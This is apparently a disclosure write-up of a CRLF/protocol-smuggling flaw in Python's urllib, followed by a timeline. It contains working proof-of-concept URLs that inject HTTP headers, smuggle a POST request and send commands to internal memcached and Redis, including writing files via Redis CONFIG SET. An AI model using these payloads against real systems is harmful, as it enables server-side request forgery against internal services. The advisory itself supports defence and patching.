Python’s built-in URL library (“urllib2” in 2.x and “urllib” in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. “smuggling” attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.
The Bug
The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):
#!/usr/bin/env python3 import sys import urllib import urllib.error import urllib.request url = sys.argv[1] try: info = urllib.request.urlopen(url).info() print(info) except urllib.error.URLError as e: print(e)
This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:
nc -l -p 12345
In a non-malicious example, we can hit that service by running:
./fetch3.py https://127.0.0.1:12345/foo
This caused the following request headers to appear in the netcat terminal:
GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Connection: close Host: 127.0.0.1:12345
Now we repeat this exercise with a malicious hostname:
./fetch3.py https://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo
The observed HTTP request is:
GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 X-injected: header x-leftover: :12345 Connection: close
Here the attacker can fully control a new injected HTTP header.
The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname:
https://localhost%0d%0ax-bar:%20:12345/foo
But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:
https://localhost%00%0d%0ax-bar:%20:12345/foo
Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.
Attack Scenarios
Here we discuss just a few of the scenarios where exploitation of these flaws could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaws could be used, and we don’t pretend to be able to predict them all.
HTTP Header Injection and Request Smuggling
GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 Connection: close
https://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo
Which produces:
GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 Connection: Keep-Alive POST /bar HTTP/1.1 Host: 127.0.0.1 Content-Length: 31 {"new":"json","content":"here"} :12345 Connection: close
Attacking memcached
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:
https://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo
GET /foo HTTP/1.1 Accept-Encoding: identity Connection: close User-Agent: Python-urllib/3.4 Host: 127.0.0.1 set foo 0 0 5 ABCDE :11211
ERROR ERROR ERROR ERROR ERROR STORED ERROR ERROR
The “foo” value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.
Attacking Redis
In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at/tmp/evil:
https://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo
# strings -n 3 /tmp/evil REDIS0006 foo bar
~redis/.profile ~redis/.ssh/authorized_keys ...
However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.
Versions Affected
Responsible Disclosure Log
2016-01-15
Notified Python Security of vulnerability with full details.
2016-01-24
2016-01-26
2016-02-07
2016-02-08
2016-02-08
2016-02-12
2016-02-12
2016-03-15
2016-03-25
2016-06-14
2016-06-15
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.